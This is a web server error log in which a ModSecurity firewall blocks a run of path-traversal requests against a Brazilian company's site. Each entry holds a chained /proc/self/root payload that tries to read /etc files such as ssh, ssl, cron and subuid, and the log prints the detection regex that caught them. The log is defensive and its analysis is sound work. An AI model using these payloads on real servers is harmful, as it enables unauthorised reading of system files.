[Fri Mar 20 03:46:19.799976 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:54050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztOzJ3M9BSuKP7CAbgGQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:21.192078 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.243.128:38364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztPfHIg5MgXLBnicPLnAAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:22.891844 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:38372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztPvHIg5MgXLBnicPLngAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:24.280606 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:32832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztQLninkcc-iUj5AottwAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:46:29.990593 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:38388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztReoXxyEfFpUF8f9TwgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:33.555728 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:51488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztSV1pVZ5mVmJwsFMBwAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:34.422140 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:32848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztSuoXxyEfFpUF8f9TxwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:34.931743 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:51492] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztSvqxLDW4GITHUkSx1gAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:36.167263 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:51500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztTPXLqtnMIWvjpaJpBAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:36.844575 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:46610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztTDJ3M9BSuKP7CAbgIwAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:46:37.484352 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:51514] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztTda6ubjKNq_cu4aeVQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:46:49.551518 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:51522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztWRCii7xarUs8iHY0IgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:47:05.773008 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.241.31:45664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztaTJ3M9BSuKP7CAbgRQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:47:19.521339 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.243.128:39254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztd7ninkcc-iUj5Aot6gAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:47:20.788969 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:35360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztePHIg5MgXLBnicPLyAAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:47:22.581539 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:43938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztehCii7xarUs8iHY0PwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:47:25.818366 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:35368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztfda6ubjKNq_cu4aefAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:47:27.173023 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:36904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abztfxCii7xarUs8iHY0RAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:47:35.174900 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:53542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzth-oXxyEfFpUF8f9T9AAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:49:12.040247 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:53558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt6PqxLDW4GITHUkSyeAAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:49:13.465675 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.243.128:35380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzt6QF0L0L-SsrnPo440QAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
